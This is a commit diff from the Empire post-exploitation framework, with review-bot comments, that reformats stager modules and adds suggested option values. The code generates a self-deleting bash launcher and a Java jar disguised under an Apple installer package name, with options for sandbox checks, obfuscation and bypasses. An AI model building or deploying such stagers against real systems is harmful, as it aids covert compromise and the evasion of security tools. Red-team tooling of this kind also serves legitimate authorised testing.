Updated suggested values for stagers and reformatted code (#200)
* updated suggested values for stagers and reformatted code

* fixed directory issue for osx/jar stager

* fixed osx/jar code generation

* added default outfile value for macho stager

* fixed byte error in backdoorlnkmacro

* added suggested values to nim launcher
Cx01N authored Aug 14, 2021
1 parent 30dc318 commit 9fde11d
Showing 36 changed files with 2,167 additions and 2,013 deletions.
23 changes: 10 additions & 13 deletions empire/server/common/stagers.py
Expand Up @@ -505,11 +505,11 @@ def generate_pkg(self, launcher, bundleZip, AppName):
return package

def generate_jar(self, launcherCode):
file = open(self.mainMenu.installPath+'data/misc/Run.java','r')
file = open(self.mainMenu.installPath+'/data/misc/Run.java', 'r')
javacode = file.read()
file.close()
javacode = javacode.replace("LAUNCHER",launcherCode)
jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/'
javacode = javacode.replace("LAUNCHER", launcherCode)
jarpath = self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/'
try:
os.makedirs(jarpath)
except OSError as e:
Expand All @@ -518,20 +518,17 @@ def generate_jar(self, launcherCode):
else:
pass

file = open(jarpath+'Run.java','w')
file = open(jarpath+'Run.java', 'w')
file.write(javacode)
file.close()
currdir = os.getcwd()
os.chdir(self.mainMenu.installPath+'data/misc/classes/')
os.system('javac com/installer/apple/Run.java')
os.system('jar -cfe '+self.mainMenu.installPath+'Run.jar com.installer.apple.Run com/installer/apple/Run.class')
os.chdir(currdir)
os.remove(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java')
jarfile = open('Run.jar','rb')
os.system('javac ' + self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.java')
os.system('jar -cfe ' + self.mainMenu.installPath + '/data/misc/Run.jar com.installer.apple.Run ' + self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.java')
jarfile = open(self.mainMenu.installPath + '/data/misc/Run.jar', 'rb')
jar = jarfile.read()
jarfile.close()
os.remove('Run.jar')
os.remove(self.mainMenu.installPath + '/data/misc/Run.jar')

return jar

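Review bot: The javac and jar invocations on the new side build a shell command by concatenating self.mainMenu.installPath, so an install path containing a space or shell metacharacters is split or interpreted by the shell, and os.system's exit status is discarded, which means a failed compile only surfaces as a FileNotFoundError on the following os.remove of Run.class. Passing an argument list to subprocess with check=True removes the quoting problem and fails at the right place: `subprocess.run(['javac', src], check=True)` and `subprocess.run(['jar', '-cfe', jar_out, 'com.installer.apple.Run', cls], check=True)`, where src, jar_out and cls are the three paths already spelled out in the hunk (subprocess would need importing at the top of the file). The fixed Run.java and Run.jar paths under data/misc are also shared by every caller, so two concurrent generate_jar calls presumably clobber each other's output; a tempfile.mkdtemp workspace would avoid that. generate_jar's signature is in the preceding hunk of this section, and the open/read/close sequences would be tidier as with blocks.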
60 changes: 31 additions & 29 deletions empire/server/stagers/multi/bash.py
Expand Up @@ -12,7 +12,7 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@harmj0y'],

'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'),
'Description': 'Generates self-deleting Bash script to execute the Empire stage0 launcher.',

'Comments': [
''
Expand All @@ -23,32 +23,34 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'python'
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'python',
'SuggestedValues': ['python'],
'Strict': True
},
'OutFile' : {
'Description' : 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required' : False,
'Value' : ''
'OutFile': {
'Description': 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required': False,
'Value': ''
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Bypasses': {
'Description': 'Bypasses as a space separated list to be prepended to the launcher',
Expand All @@ -71,14 +73,14 @@ def generate(self):

# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
listener_name = self.options['Listener']['Value']
user_agent = self.options['UserAgent']['Value']
safe_checks = self.options['SafeChecks']['Value']
bypasses = self.options['Bypasses']['Value']

# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True,
userAgent=userAgent, safeChecks=safeChecks,
launcher = self.mainMenu.stagers.generate_launcher(listener_name, language=language, encode=True,
userAgent=user_agent, safeChecks=safe_checks,
bypasses=bypasses)

if launcher == "":
Expand All @@ -87,7 +89,7 @@ def generate(self):

else:
script = "#!/bin/bash\n"
script += "%s\n" %(launcher)
script += "%s\n" % (launcher)
script += "rm -f \"$0\"\n"
script += "exit\n"
return script
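Review bot: In generate(), safe_checks is forwarded to generate_launcher as the raw option string ('True'/'False') at the call on the new side, whereas the sibling launcher stager in this commit converts Base64 and Obfuscate to real booleans with `.lower() == "true"` before passing them. If generate_launcher tests safeChecks for truthiness rather than comparing the string, SafeChecks=False would still enable the checks, so it is worth confirming how that parameter is consumed and, if it expects a bool, normalising here with `safe_checks = self.options['SafeChecks']['Value'].lower() == 'true'`. The launcher stager passes its safe_checks the same way, so whichever convention generate_launcher uses should be applied consistently in both.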
125 changes: 64 additions & 61 deletions empire/server/stagers/multi/launcher.py
Expand Up @@ -2,6 +2,7 @@
from builtins import object
from empire.server.common import helpers


class Stager(object):

def __init__(self, mainMenu, params=[]):
Expand All @@ -11,7 +12,7 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@harmj0y'],

'Description': ('Generates a one-liner stage0 launcher for Empire.'),
'Description': 'Generates a one-liner stage0 launcher for Empire.',

'Comments': [
''
Expand All @@ -22,66 +23,68 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'powershell',
'SuggestedValues': ['powershell', 'python'],
'Strict': True
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'OutFile': {
'Description': 'Filename that should be used for the generated output.',
'Required': False,
'Value': ''
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'Base64': {
'Description': 'Switch. Base64 encode the output.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required': False,
'Value': 'False',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required': False,
'Value': r'Token\All\1'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1'
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Bypasses': {
'Description': 'Bypasses as a space separated list to be prepended to the launcher',
Expand All @@ -100,33 +103,33 @@ def __init__(self, mainMenu, params=[]):
if option in self.options:
self.options[option]['Value'] = value


def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
listener_name = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate_command = self.options['ObfuscateCommand']['Value']
user_agent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
safeChecks = self.options['SafeChecks']['Value']
proxy_creds = self.options['ProxyCreds']['Value']
stager_retries = self.options['StagerRetries']['Value']
safe_checks = self.options['SafeChecks']['Value']

encode = False
if base64.lower() == "true":
encode = True

invokeObfuscation = False
invoke_obfuscation = False
if obfuscate.lower() == "true":
invokeObfuscation = True
invoke_obfuscation = True

# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode,
obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand,
userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds,
stagerRetries=stagerRetries, safeChecks=safeChecks,
launcher = self.mainMenu.stagers.generate_launcher(listener_name, language=language, encode=encode,
obfuscate=invoke_obfuscation,
obfuscationCommand=obfuscate_command,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
stagerRetries=stager_retries, safeChecks=safe_checks,
bypasses=self.options['Bypasses']['Value'])

if launcher == "":
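Review bot: The ProxyCreds description on the new side, `'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).'`, is a normal (non-raw) string containing `\]`, which is an invalid escape sequence: Python emits a DeprecationWarning for it and newer releases upgrade that to a SyntaxWarning. The neighbouring ObfuscateCommand default already uses a raw string for the same reason, so the fix is to prefix this literal with `r` or write `\\]`. This sits in the options dictionary inside __init__, whose hunk is complete in this section; the generate() hunk at the end of the section may run past what is shown here.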
